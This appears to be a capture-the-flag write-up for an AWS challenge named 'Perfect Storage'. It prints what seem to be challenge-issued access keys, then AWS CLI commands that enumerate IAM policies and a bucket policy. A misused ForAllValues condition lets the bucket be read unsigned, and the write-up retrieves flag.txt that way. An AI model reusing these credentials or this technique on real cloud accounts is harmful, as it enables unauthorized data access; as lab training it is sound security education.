Perfect Storage
Description
aws_access_key_id = AKIAU24SYXUWGFF2Y2GS
aws_secret_access_key = ylEfloqS+B+O56WesG7qg8fEl0F1WD79OyckBuTfSolve








Last updated
aws_access_key_id = AKIAU24SYXUWGFF2Y2GS
aws_secret_access_key = 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







Last updated
aws iam list-attached-user-policies --user-name thisisauselessuserfortesting --profile perfect_storageaws iam get-policy --policy-arn arn:aws:iam::332630900012:policy/hackerman101 --profile perfect_storage
aws iam get-policy-version --policy-arn arn:aws:iam::332630900012:policy/hackerman101 --version-id v2 --profile perfect_storageaws s3api get-bucket-policy --bucket perfect-storage-7815696ecbf1c96 --profile perfect_storage{
"Policy": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": "*",
"Action": [
"s3:ListBucket",
"s3:GetObject"
],
"Resource": [
"arn:aws:s3:::perfect-storage-7815696ecbf1c96/*",
"arn:aws:s3:::perfect-storage-7815696ecbf1c96"
],
"Condition": {
"ForAllValues:StringLike": {
"aws:PrincipalArn": "arn:aws:iam::666666666666:user/admin"
}
}
}
]
}
}aws s3 ls s3://perfect-storage-7815696ecbf1c96 --profile perfect_storage
aws s3 ls s3://perfect-storage-7815696ecbf1c96 --no-sign-requestaws s3 cp s3://perfect-storage-7815696ecbf1c96/flag.txt - --no-sign-request